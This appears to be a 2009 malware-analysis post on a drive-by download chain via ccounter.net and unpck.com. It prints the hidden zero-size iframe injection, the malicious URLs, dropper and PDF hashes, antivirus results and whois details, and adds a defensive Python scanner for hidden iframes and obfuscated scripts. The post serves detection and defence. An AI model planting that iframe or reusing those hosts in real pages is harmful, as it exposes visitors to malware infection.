From there we are redirected to unpck.com, and index.php contains a highly obfuscated JavaScript. The 0x0 iframe pointing at ccounter.net:

<iframe src="http://ccounter.net/s/in.cgi?default" width="0" height="0" frameborder="0"></iframe>
Once decoded we notice 20 different exploits.
If one of the exploits is successful, 1.exe is saved as winbobupam9.exe on the victim's computer.
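The chain described above (a zero-size iframe that redirects to an obfuscated loader script) is something a defender can flag in captured page content. The following is an added example, not code from the original post: it parses a constructed HTML sample that embeds the iframe quoted above, lists iframes with a 0 width or height, and scores each script block with a simple obfuscation heuristic (eval/unescape calls and a high density of %xx or \xNN escapes). The sample script body and the thresholds are constructed assumptions for illustration.

```python
import re
from html.parser import HTMLParser
# Constructed sample page: the 0x0 iframe is the one quoted in the post; the first
# <script> is a constructed obfuscated-loader stand-in, the second is benign.
SAMPLE_HTML = """<html><body><p>Welcome</p>
<iframe src="http://ccounter.net/s/in.cgi?default" width="0" height="0" frameborder="0"></iframe>
<script>var z="";for(i=0;i<90;i++){z+=unescape("%75%6e%70%63%6b%2e%63%6f%6d%2f%75%6e%69%71%75%65");}eval(z);</script>
<script>document.getElementById('x').innerHTML = 'hello';</script>
</body></html>"""

class DriveByScanner(HTMLParser):
    """Collects zero-size iframe targets and raw <script> bodies."""
    def __init__(self):
        super().__init__()
        self.hidden_iframes, self.scripts = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            dims = (a.get("width") or "", a.get("height") or "")
            if any(d.strip().rstrip("px") == "0" for d in dims):
                self.hidden_iframes.append(a.get("src") or "")
        elif tag == "script":
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))

def obfuscation_score(js):
    """Heuristic score: eval/unescape calls plus a high share of %xx or \\xNN escapes."""
    escapes = len(re.findall(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}", js))
    score = 2 if re.search(r"\beval\s*\(", js) else 0
    score += 1 if re.search(r"\bunescape\s*\(", js) else 0
    # assumed threshold: more than 40% of the script being escape sequences is unusual
    score += 2 if js and escapes * 3 / len(js) > 0.4 else 0
    return score

def scan(html):
    """Return hidden iframe targets and the number of scripts scoring >= 3."""
    p = DriveByScanner()
    p.feed(html)
    p.close()
    flagged = [s for s in p.scripts if obfuscation_score(s) >= 3]
    return {"hidden_iframes": p.hidden_iframes, "suspicious_scripts": len(flagged)}
```

Running scan(SAMPLE_HTML) reports the ccounter.net iframe and one suspicious script; the benign script scores 0.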
Links.
ccounter.net/s/in.cgi?default
winbobupam9.exe
ccounter.net/s/in.cgi?2
unpck.com/unique/index.php
unpck.com/unique/load.php
Additional information
File size: 34304 bytes
MD5...: 63a726448b7e69e61bac59a912cd75f2
SHA1..: 061c9f815ab64bba71a236c1274486450768a30c
SHA256: 71fb1fc87185f9d93b8fa1155663f07cd36be31ebd0885dbca574cc53eb79749
PEiD..: -
ThreatExpert info

Antivirus scan results (scanner, version, signature date, detection; "-" means not detected):
a-squared 4.0.0.101 2009.03.24 -
AhnLab-V3 5.0.0.2 2009.03.24 -
AntiVir 7.9.0.120 2009.03.24 -
Authentium 5.1.2.4 2009.03.23 -
Avast 4.8.1335.0 2009.03.23 -
AVG 8.5.0.283 2009.03.23 SHeur2.XGZ
BitDefender 7.2 2009.03.24 -
CAT-QuickHeal 10.00 2009.03.24 -
ClamAV 0.94.1 2009.03.24 -
Comodo 1082 2009.03.23 -
DrWeb 4.44.0.09170 2009.03.24 Trojan.Fakealert.4094
eSafe 7.0.17.0 2009.03.23 Suspicious File
eTrust-Vet 31.6.6413 2009.03.23 -
F-Prot 4.4.4.56 2009.03.23 -
F-Secure 8.0.14470.0 2009.03.24 -
Fortinet 3.117.0.0 2009.03.24 -
GData 19 2009.03.24 -
Ikarus T3.1.1.48.0 2009.03.24 -
K7AntiVirus 7.10.679 2009.03.23 -
Kaspersky 7.0.0.125 2009.03.24 -
McAfee 5562 2009.03.23 -
McAfee+Artemis 5562 2009.03.23 -
McAfee-GW-Edition 6.7.6 2009.03.24 -
Microsoft 1.4502 2009.03.24 -
NOD32 3956 2009.03.24 -
Norman 6.00.06 2009.03.23 -
nProtect 2009.1.8.0 2009.03.24 -
Panda 10.0.0.10 2009.03.24 Suspicious file
PCTools 4.4.2.0 2009.03.23 -
Prevx1 V2 2009.03.24 -
Rising 21.22.11.00 2009.03.24 -
Sophos 4.39.0 2009.03.24 -
Sunbelt 3.2.1858.2 2009.03.23 -
Symantec 1.4.4.12 2009.03.24 -
TheHacker 6.3.3.4.288 2009.03.24 -
TrendMicro 8.700.0.1004 2009.03.24 -
VBA32 3.12.10.1 2009.03.23 suspected of Trojan-PSW.Pinch.34 (paranoid heuristics)
ViRobot 2009.3.23.1660 2009.03.24 -
VirusBuster 4.6.5.0 2009.03.23 -
A malicious PDF file containing shellcode is also hosted on the same site: unpck.com/unique/pdf.php
File size: 76048 bytes
MD5...: 4637108ae649a4af27871c914e95cfbb
SHA1..: 0559f8e096021f9cff01ad399ec1604b5705b1b2
SHA256: a871cf478ef52ba4becad7cf417600f079be2f4b05d9ec27ccd2dc90eac078c9
PEiD..: -
Antivirus scan results (scanner, version, signature date, detection; "-" means not detected):
a-squared 4.0.0.101 2009.03.24 Virus.JS.Pdfka!IK
AhnLab-V3 5.0.0.2 2009.03.24 -
AntiVir 7.9.0.120 2009.03.24 -
Antiy-AVL 2.0.3.1 2009.03.24 -
Authentium 5.1.2.4 2009.03.23 -
Avast 4.8.1335.0 2009.03.23 -
AVG 8.5.0.283 2009.03.24 -
BitDefender 7.2 2009.03.24 Exploit.PDF-JS.Gen
CAT-QuickHeal 10.00 2009.03.24 -
ClamAV 0.94.1 2009.03.24 -
Comodo 1083 2009.03.24 -
DrWeb 4.44.0.09170 2009.03.24 -
eSafe 7.0.17.0 2009.03.24 -
eTrust-Vet 31.6.6414 2009.03.24 -
F-Prot 4.4.4.56 2009.03.23 -
F-Secure 8.0.14470.0 2009.03.24 -
Fortinet 3.117.0.0 2009.03.24 -
GData 19 2009.03.24 Exploit.PDF-JS.Gen
Ikarus T3.1.1.48.0 2009.03.24 Virus.JS.Pdfka
K7AntiVirus 7.10.680 2009.03.24 -
Kaspersky 7.0.0.125 2009.03.24 -
McAfee 5563 2009.03.24 -
McAfee+Artemis 5563 2009.03.24 -
McAfee-GW-Edition 6.7.6 2009.03.24 -
Microsoft 1.4502 2009.03.24 -
NOD32 3957 2009.03.24 -
Norman 6.00.06 2009.03.24 -
nProtect 2009.1.8.0 2009.03.24 Exploit.PDF-JS.Gen.C03
Panda 10.0.0.10 2009.03.24 -
PCTools 4.4.2.0 2009.03.24 -
Prevx1 V2 2009.03.24 -
Rising 21.22.12.00 2009.03.24 -
Sophos 4.39.0 2009.03.24 -
Sunbelt 3.2.1858.2 2009.03.24 -
Symantec 1.4.4.12 2009.03.24 -
TheHacker 6.3.3.4.289 2009.03.24 -
TrendMicro 8.700.0.1004 2009.03.24 -
VBA32 3.12.10.1 2009.03.23 -
ViRobot 2009.3.24.1661 2009.03.24 -
VirusBuster 4.6.5.0 2009.03.24 -

IP details

ccounter.net - 94.247.2.30
Creation Date: 27-dec-2008
Registrar: ENOM, INC.
Name Server: NS1.LDNSKA.CN - NS2.LDNSKA.CN
Registrant Contact:
Stanislaw Podlewski ()
Ul. Wspolna 30
Warsaw, WARSAW 930
PL
unpck.com - 79.174.64.209
Creation Date: 08-feb-2009
Name Server: DNS01.GPN.REGISTER.COM - DNS02.GPN.REGISTER.COM - DNS03.GPN.REGISTER.COM - DNS04.GPN.REGISTER.COM - DNS05.GPN.REGISTER.COM
Registrar: REGISTER.COM, INC.
Registrant Contact: Whois Privacy Protection Service, Inc.